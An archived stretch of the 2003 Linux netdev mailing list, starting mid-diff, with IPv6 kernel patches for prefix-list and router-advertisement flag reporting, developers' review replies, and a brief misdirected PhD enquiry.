(ra_msg->icmph.icmp6_addrconf_managed ? + IF_RA_MANAGED : 0) | + (ra_msg->icmph.icmp6_addrconf_other ? + IF_RA_OTHERCONF : 0); lifetime = ntohs(ra_msg->icmph.icmp6_rt_lifetime); diff -ruN linux-2.5.73.org/net/ipv6/route.c test/linux-2.5.73/net/ipv6/route.c --- linux-2.5.73.org/net/ipv6/route.c 2003-06-22 11:33:05.000000000 -0700 +++ test/linux-2.5.73/net/ipv6/route.c 2003-07-16 10:42:01.000000000 -0700 @@ -1400,13 +1400,20 @@ struct in6_addr *src, int iif, int type, u32 pid, u32 seq, - struct nlmsghdr *in_nlh) + struct nlmsghdr *in_nlh, int prefix) { struct rtmsg *rtm; struct nlmsghdr *nlh; unsigned char *b = skb->tail; struct rta_cacheinfo ci; + if (prefix) { /* user wants prefix routes only */ + if (!(rt->rt6i_flags & RTF_PREFIX_RT)) { + /* success since this is not a prefix route */ + return 1; + } + } + if (!pid && in_nlh) { pid = in_nlh->nlmsg_pid; } @@ -1487,10 +1494,16 @@ static int rt6_dump_route(struct rt6_info *rt, void *p_arg) { struct rt6_rtnl_dump_arg *arg = (struct rt6_rtnl_dump_arg *) p_arg; + struct rtmsg *rtm; + int prefix; + rtm = NLMSG_DATA(arg->cb->nlh); + if (rtm) + prefix = (rtm->rtm_flags & RTM_F_PREFIX) != 0; + else prefix = 0; return rt6_fill_node(arg->skb, rt, NULL, NULL, 0, RTM_NEWROUTE, NETLINK_CB(arg->cb->skb).pid, arg->cb->nlh->nlmsg_seq, - NULL); + NULL, prefix); } static int fib6_dump_node(struct fib6_walker_t *w) @@ -1638,7 +1651,7 @@ &fl.fl6_dst, &fl.fl6_src, iif, RTM_NEWROUTE, NETLINK_CB(in_skb).pid, - nlh->nlmsg_seq, nlh); + nlh->nlmsg_seq, nlh, 0); if (err < 0) { err = -EMSGSIZE; goto out_free; @@ -1664,7 +1677,7 @@ netlink_set_err(rtnl, 0, RTMGRP_IPV6_ROUTE, ENOBUFS); return; } - if (rt6_fill_node(skb, rt, NULL, NULL, 0, event, 0, 0, nlh) < 0) { + if (rt6_fill_node(skb, rt, NULL, NULL, 0, event, 0, 0, nlh, 0) < 0) { kfree_skb(skb); netlink_set_err(rtnl, 0, RTMGRP_IPV6_ROUTE, EINVAL); return; From maw48@hermes.cam.ac.uk Thu Jul 17 14:48:39 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 17 Jul 2003 14:48:46 -0700 (PDT) 
Received: from maroon.csi.cam.ac.uk (maroon.csi.cam.ac.uk [131.111.8.2]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6HLmbFl031428 for ; Thu, 17 Jul 2003 14:48:39 -0700 Received: from prayer by maroon.csi.cam.ac.uk with local (Exim 4.14) id 19dGc8-0007P2-NJ for netdev@oss.sgi.com; Thu, 17 Jul 2003 22:48:36 +0100 From: "M.A. Williamson" To: netdev@oss.sgi.com Subject: PhD Research Date: 17 Jul 2003 22:48:36 +0100 X-Mailer: Prayer v1.0.9 X-Originating-IP: [131.111.8.103] Mime-Version: 1.0 Content-Type: text/plain; format=flowed; charset=ISO-8859-1 Message-Id: X-archive-position: 4141 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: maw48@cam.ac.uk Precedence: bulk X-list: netdev Hello to whoever receives this e-mail - I would like to ask for your help. I've been trying to make contact with someone from your R&D for some time, as I wish to establish a dialogue about some academic research I want to carry out for my PhD. The research is in dynamic code optimisation, which I realise isn't necessarily your personal focus - could you possibly suggest someone I could contact within SGI to discuss this further? I've had very little luck in getting through the external-facing administration of the company (which refuses to give out any contact details) and have been forced to resort to finding SGI e-mail addresses in the Linux source (do I get credit for lateral thinking?). 
Thanks in advance,
Mark

From yoshfuji@linux-ipv6.org Thu Jul 17 14:51:40 2003
Received: with ECARTIS (v1.0.0; list netdev); Thu, 17 Jul 2003 14:51:46 -0700 (PDT)
Received: from yue.hongo.wide.ad.jp (yue.hongo.wide.ad.jp [203.178.139.94]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6HLpcFl032072 for ; Thu, 17 Jul 2003 14:51:39 -0700
Received: from localhost (localhost [127.0.0.1]) by yue.hongo.wide.ad.jp (8.12.3+3.5Wbeta/8.12.3/Debian-5) with ESMTP id h6HLrBBo012990; Fri, 18 Jul 2003 06:53:11 +0900
Date: Thu, 17 Jul 2003 23:53:11 +0200 (CEST)
Message-Id: <20030717.235311.94788744.yoshfuji@linux-ipv6.org>
To: kuznet@ms2.inr.ac.ru
Cc: krkumar@us.ibm.com, davem@redhat.com, netdev@oss.sgi.com, linux-net@vger.kernel.org, yoshfuji@linux-ipv6.org
Subject: Re: [PATCH 1/4] Prefix List against 2.5.73
From: YOSHIFUJI Hideaki / =?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?=
In-Reply-To: <200307170038.EAA12945@dub.inr.ac.ru>
References: <3F15E86F.2030707@us.ibm.com> <200307170038.EAA12945@dub.inr.ac.ru>
Organization: USAGI Project
X-URL: http://www.yoshifuji.org/%7Ehideaki/
X-Fingerprint: 90 22 65 EB 1E CF 3A D1 0B DF 80 D8 48 07 F8 94 E0 62 0E EA
X-PGP-Key-URL: http://www.yoshifuji.org/%7Ehideaki/hideaki@yoshifuji.org.asc
X-Face: "5$Al-.M>NJ%a'@hhZdQm:."qn~PA^gq4o*>iCFToq*bAi#4FRtx}enhuQKz7fNqQz\BYU]
 $~O_5m-9'}MIs`XGwIEscw;e5b>n"B_?j/AkL~i/MEaZBLP
X-Mailer: Mew version 2.2 on Emacs 20.7 / Mule 4.1 (AOI)
Mime-Version: 1.0
Content-Type: Text/Plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
X-archive-position: 4142
X-ecartis-version: Ecartis v1.0.0
Sender: netdev-bounce@oss.sgi.com
Errors-to: netdev-bounce@oss.sgi.com
X-original-sender: yoshfuji@linux-ipv6.org
Precedence: bulk
X-list: netdev

In article <200307170038.EAA12945@dub.inr.ac.ru> (at Thu, 17 Jul 2003 04:38:00 +0400 (MSD)), kuznet@ms2.inr.ac.ru says:

> Actually, the original plan was to use ifli_family to query something
> or to direct a request to a specific interface on some netdevice.
> I wanted to reserve IFLI_PROTINFO attribute to encapsulate information
> private for specific family. It was not realized mostly because of absense
> of such information.
>
> Maybe, you will want to resurrect this.

Ah, okay, I'm ok to reuse ifi_family in ifinfomsg{}.

e.g. if ifi_family == AF_INET6 (and/or AF_UNSPEC?), kernel sends
per-interface IPv6 information.

 IFLA_INET6        provides if_flags (etc?)
 IFLA_INET6_CONF   provides cnf (without proc_dir_entry :-p)
 IFLA_INET6_STATS  provides stats (XXX: missing entries in stats)
 IFLA_INET6_MCAST  provides mc_XXX things
 etc, etc.

sounds reasonable?

-- 
Hideaki YOSHIFUJI @ USAGI Project
GPG FP: 9022 65EB 1ECF 3AD1 0BDF 80D8 4807 F894 E062 0EEA

From davem@redhat.com Thu Jul 17 15:01:43 2003
Received: with ECARTIS (v1.0.0; list netdev); Thu, 17 Jul 2003 15:01:47 -0700 (PDT)
Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6HM1gFl000307 for ; Thu, 17 Jul 2003 15:01:43 -0700
Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id OAA26844; Thu, 17 Jul 2003 14:51:16 -0700
Date: Thu, 17 Jul 2003 14:51:15 -0700
From: "David S. Miller"
To: kuznet@ms2.inr.ac.ru
Cc: pekkas@netcore.fi, mika.liljeberg@welho.com, jmorris@redhat.com, netdev@oss.sgi.com, dlstevens@us.ibm.com
Subject: Re: Anycast usage, final diagnosis?
(was: IPv6: Fix broken anycast Message-Id: <20030717145115.046fd5ee.davem@redhat.com> In-Reply-To: <200307172052.AAA15032@dub.inr.ac.ru> References: <200307172052.AAA15032@dub.inr.ac.ru> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4143 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Fri, 18 Jul 2003 00:52:03 +0400 (MSD) kuznet@ms2.inr.ac.ru wrote: > > No user should be able to join anycast group, IMHO. > > OK. Done, the patch enclosed. Pekka, please ACK Alexey's patch, I'd like to apply it. Thanks. From maw48@hermes.cam.ac.uk Thu Jul 17 15:02:38 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 17 Jul 2003 15:02:40 -0700 (PDT) Received: from maroon.csi.cam.ac.uk (maroon.csi.cam.ac.uk [131.111.8.2]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6HM2bFl000655 for ; Thu, 17 Jul 2003 15:02:37 -0700 Received: from prayer by maroon.csi.cam.ac.uk with local (Exim 4.14) id 19dGpg-0007p3-Kv for netdev@oss.sgi.com; Thu, 17 Jul 2003 23:02:36 +0100 From: "M.A. Williamson" To: netdev@oss.sgi.com Subject: re: PhD Research (sorry) Date: 17 Jul 2003 23:02:36 +0100 X-Mailer: Prayer v1.0.9 X-Originating-IP: [131.111.8.103] Mime-Version: 1.0 Content-Type: text/plain; format=flowed; charset=ISO-8859-1 Message-Id: X-archive-position: 4144 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: maw48@cam.ac.uk Precedence: bulk X-list: netdev I'm told that this e-mail list is merely hosted by SGI for the community, rather than being internal as I thought - sorry guys, I didn't know. I apologise for spamming you with my ignorance! 
Cheers, Mark From krkumar@us.ibm.com Thu Jul 17 15:08:21 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 17 Jul 2003 15:08:31 -0700 (PDT) Received: from e31.co.us.ibm.com (e31.co.us.ibm.com [32.97.110.129]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6HM8GFl001426 for ; Thu, 17 Jul 2003 15:08:21 -0700 Received: from westrelay04.boulder.ibm.com (westrelay04.boulder.ibm.com [9.17.193.32]) by e31.co.us.ibm.com (8.12.9/8.12.2) with ESMTP id h6HM7URZ242256; Thu, 17 Jul 2003 18:07:30 -0400 Received: from DYN318430.beaverton.ibm.com (d03av02.boulder.ibm.com [9.17.193.82]) by westrelay04.boulder.ibm.com (8.12.9/NCO/VER6.5) with ESMTP id h6HM7TOr196626; Thu, 17 Jul 2003 16:07:29 -0600 Date: Thu, 17 Jul 2003 15:06:02 -0700 (PDT) From: Krishna Kumar X-X-Sender: krkumar@DYN318430.beaverton.ibm.com To: kuznet@ms2.inr.ac.ru cc: yoshfuji@linux-ipv6.org, , , Subject: [PATCH 2/2] Prefix List and O/M flags against 2.4.21 In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 4145 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: krkumar@us.ibm.com Precedence: bulk X-list: netdev The same patch against 2.4.21 Thanks, - KK diff -ruN linux-2.4.21.org/include/linux/ipv6_route.h test/linux.2.4.21/include/linux/ipv6_route.h --- linux-2.4.21.org/include/linux/ipv6_route.h 1998-08-27 19:33:08.000000000 -0700 +++ test/linux.2.4.21/include/linux/ipv6_route.h 2003-07-17 11:42:17.000000000 -0700 @@ -25,6 +25,7 @@ #define RTF_DEFAULT 0x00010000 /* default - learned via ND */ #define RTF_ALLONLINK 0x00020000 /* fallback, no routers on link */ #define RTF_ADDRCONF 0x00040000 /* addrconf route - RA */ +#define RTF_PREFIX_RT 0x00080000 /* A prefix only route - RA */ #define RTF_NONEXTHOP 0x00200000 /* route with no nexthop */ #define RTF_EXPIRES 0x00400000 diff -ruN linux-2.4.21.org/include/linux/rtnetlink.h test/linux.2.4.21/include/linux/rtnetlink.h --- 
linux-2.4.21.org/include/linux/rtnetlink.h 2002-11-28 15:53:15.000000000 -0800 +++ test/linux.2.4.21/include/linux/rtnetlink.h 2003-07-17 13:32:36.000000000 -0700 @@ -46,9 +46,11 @@ #define RTM_DELTFILTER (RTM_BASE+29) #define RTM_GETTFILTER (RTM_BASE+30) -#define RTM_MAX (RTM_BASE+31) +#define RTM_GETIFFLAGS (RTM_BASE+34) -/* +#define RTM_MAX (RTM_GETIFFLAGS+1) + +/* Generic structure for encapsulation optional route information. It is reminiscent of sockaddr, but with sa_family replaced with attribute type. @@ -60,6 +62,13 @@ unsigned short rta_type; }; +/* Structure to return per interface device flags */ +struct ifp_if6info +{ + int ifindex; + int flags; +}; + /* Macros to handle rtattributes */ #define RTA_ALIGNTO 4 @@ -167,6 +176,7 @@ #define RTM_F_NOTIFY 0x100 /* Notify user of route change */ #define RTM_F_CLONED 0x200 /* This route is cloned */ #define RTM_F_EQUALIZE 0x400 /* Multipath equalizer: NI */ +#define RTM_F_PREFIX 0x800 /* Prefix addresses */ /* Reserved table identifiers */ diff -ruN linux-2.4.21.org/include/net/if_inet6.h test/linux.2.4.21/include/net/if_inet6.h --- linux-2.4.21.org/include/net/if_inet6.h 2003-06-13 07:51:39.000000000 -0700 +++ test/linux.2.4.21/include/net/if_inet6.h 2003-07-17 11:43:50.000000000 -0700 @@ -15,6 +15,8 @@ #ifndef _NET_IF_INET6_H #define _NET_IF_INET6_H +#define IF_RA_OTHERCONF 0x80 +#define IF_RA_MANAGED 0x40 #define IF_RA_RCVD 0x20 #define IF_RS_SENT 0x10 diff -ruN linux-2.4.21.org/net/ipv6/addrconf.c test/linux.2.4.21/net/ipv6/addrconf.c --- linux-2.4.21.org/net/ipv6/addrconf.c 2003-06-13 07:51:39.000000000 -0700 +++ test/linux.2.4.21/net/ipv6/addrconf.c 2003-07-17 13:34:02.000000000 -0700 @@ -101,7 +101,7 @@ static int addrconf_ifdown(struct net_device *dev, int how); -static void addrconf_dad_start(struct inet6_ifaddr *ifp); +static void addrconf_dad_start(struct inet6_ifaddr *ifp, int flags); static void addrconf_dad_timer(unsigned long data); static void addrconf_dad_completed(struct inet6_ifaddr *ifp); 
static void addrconf_rs_timer(unsigned long data); @@ -889,7 +889,7 @@ rtmsg.rtmsg_dst_len = 8; rtmsg.rtmsg_metric = IP6_RT_PRIO_ADDRCONF; rtmsg.rtmsg_ifindex = dev->ifindex; - rtmsg.rtmsg_flags = RTF_UP|RTF_ADDRCONF; + rtmsg.rtmsg_flags = RTF_UP; rtmsg.rtmsg_type = RTMSG_NEWROUTE; ip6_route_add(&rtmsg, NULL); } @@ -916,7 +916,7 @@ struct in6_addr addr; ipv6_addr_set(&addr, htonl(0xFE800000), 0, 0, 0); - addrconf_prefix_route(&addr, 64, dev, 0, RTF_ADDRCONF); + addrconf_prefix_route(&addr, 64, dev, 0, 0); } static struct inet6_dev *addrconf_add_dev(struct net_device *dev) @@ -1008,7 +1008,8 @@ } } else if (pinfo->onlink && valid_lft) { addrconf_prefix_route(&pinfo->prefix, pinfo->prefix_len, - dev, rt_expires, RTF_ADDRCONF|RTF_EXPIRES); + dev, rt_expires, + RTF_ADDRCONF|RTF_EXPIRES|RTF_PREFIX_RT); } if (rt) dst_release(&rt->u.dst); @@ -1054,7 +1055,7 @@ return; } - addrconf_dad_start(ifp); + addrconf_dad_start(ifp, RTF_ADDRCONF|RTF_PREFIX_RT); } if (ifp && valid_lft == 0) { @@ -1166,7 +1167,7 @@ ifp = ipv6_add_addr(idev, pfx, plen, scope, IFA_F_PERMANENT); if (!IS_ERR(ifp)) { - addrconf_dad_start(ifp); + addrconf_dad_start(ifp, 0); in6_ifa_put(ifp); return 0; } @@ -1341,7 +1342,7 @@ ifp = ipv6_add_addr(idev, addr, 64, IFA_LINK, IFA_F_PERMANENT); if (!IS_ERR(ifp)) { - addrconf_dad_start(ifp); + addrconf_dad_start(ifp, 0); in6_ifa_put(ifp); } } @@ -1578,8 +1579,7 @@ memset(&rtmsg, 0, sizeof(struct in6_rtmsg)); rtmsg.rtmsg_type = RTMSG_NEWROUTE; rtmsg.rtmsg_metric = IP6_RT_PRIO_ADDRCONF; - rtmsg.rtmsg_flags = (RTF_ALLONLINK | RTF_ADDRCONF | - RTF_DEFAULT | RTF_UP); + rtmsg.rtmsg_flags = (RTF_ALLONLINK | RTF_DEFAULT | RTF_UP); rtmsg.rtmsg_ifindex = ifp->idev->dev->ifindex; @@ -1593,7 +1593,7 @@ /* * Duplicate Address Detection */ -static void addrconf_dad_start(struct inet6_ifaddr *ifp) +static void addrconf_dad_start(struct inet6_ifaddr *ifp, int flags) { struct net_device *dev; unsigned long rand_num; @@ -1603,7 +1603,7 @@ addrconf_join_solict(dev, &ifp->addr); if 
(ifp->prefix_len != 128 && (ifp->flags&IFA_F_PERMANENT)) - addrconf_prefix_route(&ifp->addr, ifp->prefix_len, dev, 0, RTF_ADDRCONF); + addrconf_prefix_route(&ifp->addr, ifp->prefix_len, dev, 0, flags); net_srandom(ifp->addr.s6_addr32[3]); rand_num = net_random() % (ifp->idev->cnf.rtr_solicit_delay ? : 1); @@ -1971,6 +1971,42 @@ netlink_broadcast(rtnl, skb, 0, RTMGRP_IPV6_IFADDR, GFP_ATOMIC); } +int inet6_dump_linkflags(struct sk_buff *skb, struct netlink_callback *cb) +{ + int ifindex, flags; + struct net_device *dev; + struct inet6_dev *idev; + struct nlmsghdr *nlh; + struct ifp_if6info *ifp = NLMSG_DATA(cb->nlh); + unsigned char *org_tail = skb->tail; + + ifindex = ifp->ifindex; + if ((dev = dev_get_by_index(ifindex)) == NULL) + goto out; + if ((idev = in6_dev_get(dev)) != NULL) { + flags = idev->if_flags; + in6_dev_put(idev); + } else + flags = 0; + dev_put(dev); + + nlh = NLMSG_PUT(skb, NETLINK_CB(cb->skb).pid, cb->nlh->nlmsg_seq, + RTM_GETIFFLAGS, sizeof(*ifp)); + ifp = NLMSG_DATA(nlh); + ifp->flags = flags; + ifp->ifindex = ifindex; /* duplicate info for user to verify */ + + nlh->nlmsg_len = skb->tail - org_tail; + return skb->len; + +nlmsg_failure: + printk(KERN_INFO "inet6_dump_linkflags:skb size not enough\n"); + skb_trim(skb, org_tail - skb->data); + +out: + return -1; +} + static struct rtnetlink_link inet6_rtnetlink_table[RTM_MAX-RTM_BASE+1] = { { NULL, NULL, }, @@ -1987,6 +2023,36 @@ { inet6_rtm_delroute, NULL, }, { inet6_rtm_getroute, inet6_dump_fib, }, { NULL, NULL, }, + + { NULL, NULL, }, + { NULL, NULL, }, + { NULL, NULL, }, + { NULL, NULL, }, + + { NULL, NULL, }, + { NULL, NULL, }, + { NULL, NULL, }, + { NULL, NULL, }, + + { NULL, NULL, }, + { NULL, NULL, }, + { NULL, NULL, }, + { NULL, NULL, }, + + { NULL, NULL, }, + { NULL, NULL, }, + { NULL, NULL, }, + { NULL, NULL, }, + + { NULL, NULL, }, + { NULL, NULL, }, + { NULL, NULL, }, + { NULL, NULL, }, + + { NULL, NULL, }, + { NULL, NULL, }, + { NULL, inet6_dump_linkflags }, + { NULL, NULL, }, }; 
static void ipv6_ifa_notify(int event, struct inet6_ifaddr *ifp) diff -ruN linux-2.4.21.org/net/ipv6/ndisc.c test/linux.2.4.21/net/ipv6/ndisc.c --- linux-2.4.21.org/net/ipv6/ndisc.c 2003-06-13 07:51:39.000000000 -0700 +++ test/linux.2.4.21/net/ipv6/ndisc.c 2003-07-14 15:09:28.000000000 -0700 @@ -940,6 +940,16 @@ */ in6_dev->if_flags |= IF_RA_RCVD; } + /* + * Remember the managed/otherconf flags from most recently + * receieved RA message (RFC 2462) -- yoshfuji + */ + in6_dev->if_flags = (in6_dev->if_flags & ~(IF_RA_MANAGED| + IF_RA_OTHERCONF)) | + (ra_msg->icmph.icmp6_addrconf_managed ? + IF_RA_MANAGED : 0) | + (ra_msg->icmph.icmp6_addrconf_other ? + IF_RA_OTHERCONF : 0); lifetime = ntohs(ra_msg->icmph.icmp6_rt_lifetime); diff -ruN linux-2.4.21.org/net/ipv6/route.c test/linux.2.4.21/net/ipv6/route.c --- linux-2.4.21.org/net/ipv6/route.c 2003-06-13 07:51:39.000000000 -0700 +++ test/linux.2.4.21/net/ipv6/route.c 2003-07-16 11:09:45.000000000 -0700 @@ -1516,13 +1516,20 @@ struct in6_addr *src, int iif, int type, u32 pid, u32 seq, - struct nlmsghdr *in_nlh) + struct nlmsghdr *in_nlh, int prefix) { struct rtmsg *rtm; struct nlmsghdr *nlh; unsigned char *b = skb->tail; struct rta_cacheinfo ci; + if (prefix) { /* user wants prefix routes only */ + if (!(rt->rt6i_flags & RTF_PREFIX_RT)) { + /* success since this is not a prefix route */ + return 1; + } + } + if (!pid && in_nlh) { pid = in_nlh->nlmsg_pid; } @@ -1603,10 +1610,16 @@ static int rt6_dump_route(struct rt6_info *rt, void *p_arg) { struct rt6_rtnl_dump_arg *arg = (struct rt6_rtnl_dump_arg *) p_arg; + struct rtmsg *rtm; + int prefix; + rtm = NLMSG_DATA(arg->cb->nlh); + if (rtm) + prefix = (rtm->rtm_flags & RTM_F_PREFIX) != 0; + else prefix = 0; return rt6_fill_node(arg->skb, rt, NULL, NULL, 0, RTM_NEWROUTE, NETLINK_CB(arg->cb->skb).pid, arg->cb->nlh->nlmsg_seq, - NULL); + NULL, prefix); } static int fib6_dump_node(struct fib6_walker_t *w) @@ -1757,7 +1770,7 @@ fl.nl_u.ip6_u.saddr, iif, RTM_NEWROUTE, 
NETLINK_CB(in_skb).pid, - nlh->nlmsg_seq, nlh); + nlh->nlmsg_seq, nlh, 0); if (err < 0) { err = -EMSGSIZE; goto out_free; @@ -1783,7 +1796,7 @@ netlink_set_err(rtnl, 0, RTMGRP_IPV6_ROUTE, ENOBUFS); return; } - if (rt6_fill_node(skb, rt, NULL, NULL, 0, event, 0, 0, nlh) < 0) { + if (rt6_fill_node(skb, rt, NULL, NULL, 0, event, 0, 0, nlh, 0) < 0) { kfree_skb(skb); netlink_set_err(rtnl, 0, RTMGRP_IPV6_ROUTE, EINVAL); return; From yoshfuji@linux-ipv6.org Thu Jul 17 15:20:37 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 17 Jul 2003 15:20:43 -0700 (PDT) Received: from yue.hongo.wide.ad.jp (yue.hongo.wide.ad.jp [203.178.139.94]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6HMKZFl002321 for ; Thu, 17 Jul 2003 15:20:37 -0700 Received: from localhost (localhost [127.0.0.1]) by yue.hongo.wide.ad.jp (8.12.3+3.5Wbeta/8.12.3/Debian-5) with ESMTP id h6HMM9Bo013348; Fri, 18 Jul 2003 07:22:10 +0900 Date: Fri, 18 Jul 2003 00:22:09 +0200 (CEST) Message-Id: <20030718.002209.104303756.yoshfuji@linux-ipv6.org> To: krkumar@us.ibm.com Cc: kuznet@ms2.inr.ac.ru, davem@redhat.com, netdev@oss.sgi.com, linux-net@vger.kernel.org, yoshfuji@linux-ipv6.org Subject: Re: [PATCH 2/2] Prefix List and O/M flags against 2.4.21 From: YOSHIFUJI Hideaki / =?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?= In-Reply-To: References: Organization: USAGI Project X-URL: http://www.yoshifuji.org/%7Ehideaki/ X-Fingerprint: 90 22 65 EB 1E CF 3A D1 0B DF 80 D8 48 07 F8 94 E0 62 0E EA X-PGP-Key-URL: http://www.yoshifuji.org/%7Ehideaki/hideaki@yoshifuji.org.asc X-Face: "5$Al-.M>NJ%a'@hhZdQm:."qn~PA^gq4o*>iCFToq*bAi#4FRtx}enhuQKz7fNqQz\BYU] $~O_5m-9'}MIs`XGwIEscw;e5b>n"B_?j/AkL~i/MEaZBLP X-Mailer: Mew version 2.2 on Emacs 20.7 / Mule 4.1 (AOI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 4146 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: yoshfuji@linux-ipv6.org Precedence: 
bulk X-list: netdev In article (at Thu, 17 Jul 2003 15:06:02 -0700 (PDT)), Krishna Kumar says: > The same patch against 2.4.21 Hmm, you seem to still be misunderstanding some of our points. :-p Alexey says we may want to use ifi_family for per-interface L3 information including M/O bits. At least, new RTM_xxx should not be restricted to get such flags. -- Hideaki YOSHIFUJI @ USAGI Project GPG FP: 9022 65EB 1ECF 3AD1 0BDF 80D8 4807 F894 E062 0EEA From yoshfuji@linux-ipv6.org Thu Jul 17 15:26:30 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 17 Jul 2003 15:26:36 -0700 (PDT) Received: from yue.hongo.wide.ad.jp (yue.hongo.wide.ad.jp [203.178.139.94]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6HMQTFl002830 for ; Thu, 17 Jul 2003 15:26:30 -0700 Received: from localhost (localhost [127.0.0.1]) by yue.hongo.wide.ad.jp (8.12.3+3.5Wbeta/8.12.3/Debian-5) with ESMTP id h6HMS1Bo013388; Fri, 18 Jul 2003 07:28:01 +0900 Date: Fri, 18 Jul 2003 00:28:01 +0200 (CEST) Message-Id: <20030718.002801.91948420.yoshfuji@linux-ipv6.org> To: davem@redhat.com Cc: kuznet@ms2.inr.ac.ru, pekkas@netcore.fi, mika.liljeberg@welho.com, jmorris@redhat.com, netdev@oss.sgi.com, dlstevens@us.ibm.com, yoshfuji@linux-ipv6.org Subject: Re: Anycast usage, final diagnosis?
(was: IPv6: Fix broken anycast From: YOSHIFUJI Hideaki / =?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?= In-Reply-To: <20030717145115.046fd5ee.davem@redhat.com> References: <200307172052.AAA15032@dub.inr.ac.ru> <20030717145115.046fd5ee.davem@redhat.com> Organization: USAGI Project X-URL: http://www.yoshifuji.org/%7Ehideaki/ X-Fingerprint: 90 22 65 EB 1E CF 3A D1 0B DF 80 D8 48 07 F8 94 E0 62 0E EA X-PGP-Key-URL: http://www.yoshifuji.org/%7Ehideaki/hideaki@yoshifuji.org.asc X-Face: "5$Al-.M>NJ%a'@hhZdQm:."qn~PA^gq4o*>iCFToq*bAi#4FRtx}enhuQKz7fNqQz\BYU] $~O_5m-9'}MIs`XGwIEscw;e5b>n"B_?j/AkL~i/MEaZBLP X-Mailer: Mew version 2.2 on Emacs 20.7 / Mule 4.1 (AOI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 4147 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: yoshfuji@linux-ipv6.org Precedence: bulk X-list: netdev In article <20030717145115.046fd5ee.davem@redhat.com> (at Thu, 17 Jul 2003 14:51:15 -0700), "David S. Miller" says: > > > No user should be able to join anycast group, IMHO. > > > > OK. Done, the patch enclosed. > > Pekka, please ACK Alexey's patch, I'd like to apply it. I'm not pekka, but It seems ok to me, too. 
--yoshfuji From krkumar@us.ibm.com Thu Jul 17 15:34:41 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 17 Jul 2003 15:34:45 -0700 (PDT) Received: from e1.ny.us.ibm.com (e1.ny.us.ibm.com [32.97.182.101]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6HMYYFl003373 for ; Thu, 17 Jul 2003 15:34:40 -0700 Received: from northrelay02.pok.ibm.com (northrelay02.pok.ibm.com [9.56.224.150]) by e1.ny.us.ibm.com (8.12.9/8.12.2) with ESMTP id h6HMXiKb214574; Thu, 17 Jul 2003 18:33:44 -0400 Received: from us.ibm.com (d01av02.pok.ibm.com [9.56.224.216]) by northrelay02.pok.ibm.com (8.12.9/NCO/VER6.5) with ESMTP id h6HMXf1V059276; Thu, 17 Jul 2003 18:33:42 -0400 Message-ID: <3F17245D.9040806@us.ibm.com> Date: Thu, 17 Jul 2003 15:34:05 -0700 From: Krishna Kumar Organization: IBM User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.2.1) Gecko/20021130 X-Accept-Language: en-us, en MIME-Version: 1.0 To: YOSHIFUJI Hideaki CC: krkumar@us.ibm.com, kuznet@ms2.inr.ac.ru, davem@redhat.com, netdev@oss.sgi.com, linux-net@vger.kernel.org Subject: Re: [PATCH 2/2] Prefix List and O/M flags against 2.4.21 References: <20030718.002209.104303756.yoshfuji@linux-ipv6.org> In-Reply-To: <20030718.002209.104303756.yoshfuji@linux-ipv6.org> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 4148 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: krkumar@us.ibm.com Precedence: bulk X-list: netdev > Hmm, you seems still misunderstanding some of our points. :-p > Alexey says we may want to use ifi_family for per-interface L3 information > including M/O bits. It is not a misunderstanding, I had replied to that mail saying that I don't have any knowledge of using this new interface. If you prefer, I can split the patch for prefix list vs O/M bits so that the former is accepted without any issues. Someone else can modify the O/M to suit new needs. 
